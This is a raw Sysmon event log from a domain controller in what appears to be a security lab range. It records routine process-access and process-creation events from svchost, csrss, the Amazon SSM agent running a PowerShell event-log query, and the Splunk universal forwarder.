09:20:22.492{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054188Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.492{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054187Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.492{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CD6-6151-6900-00000000FD01}3836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054186Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.491{5EBD8912-8CD2-6151-4300-00000000FD01}37603896C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{5EBD8912-8CD6-6151-6900-00000000FD01}3836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+6f23e 154100x80000000000000001054185Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.492{5EBD8912-8CD6-6151-6900-00000000FD01}3836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-WinEvent -FilterHashtable @( @{ LogName='System'; ProviderName='Microsoft-Windows-Kernel-General'; Id=12; Level=4 }, @{ LogName='System'; ProviderName='Microsoft-Windows-WER-SystemErrorReporting'; Id=1001; Level=2 } ) | Sort-Object TimeCreated -Descending" "| Select-Object" "Id, Level, ProviderName, TimeCreated, Properties" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5EBD8912-8CD2-6151-4300-00000000FD01}3760C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 23542300x80000000000000001054184Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.465{5EBD8912-8CD5-6151-6200-00000000FD01}3396NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054183Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.455{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD6-6151-6800-00000000FD01}3800C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054182Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.455{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054181Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.455{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054180Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.455{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054179Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.455{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054178Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.455{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054177Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.455{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054176Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.455{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054175Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.455{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054174Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.455{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054173Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.455{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CD6-6151-6800-00000000FD01}3800C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054172Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.455{5EBD8912-8CD0-6151-3000-00000000FD01}19563432C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8CD6-6151-6800-00000000FD01}3800C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054171Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.456{5EBD8912-8CD6-6151-6800-00000000FD01}3800C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\admon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054170Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.445{5EBD8912-8CD0-6151-2500-00000000FD01}2936NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054169Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.343{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD6-6151-6700-00000000FD01}3688C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054168Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.343{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054167Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.343{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054166Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.343{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054165Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.343{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054164Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.343{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054163Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.343{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054162Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 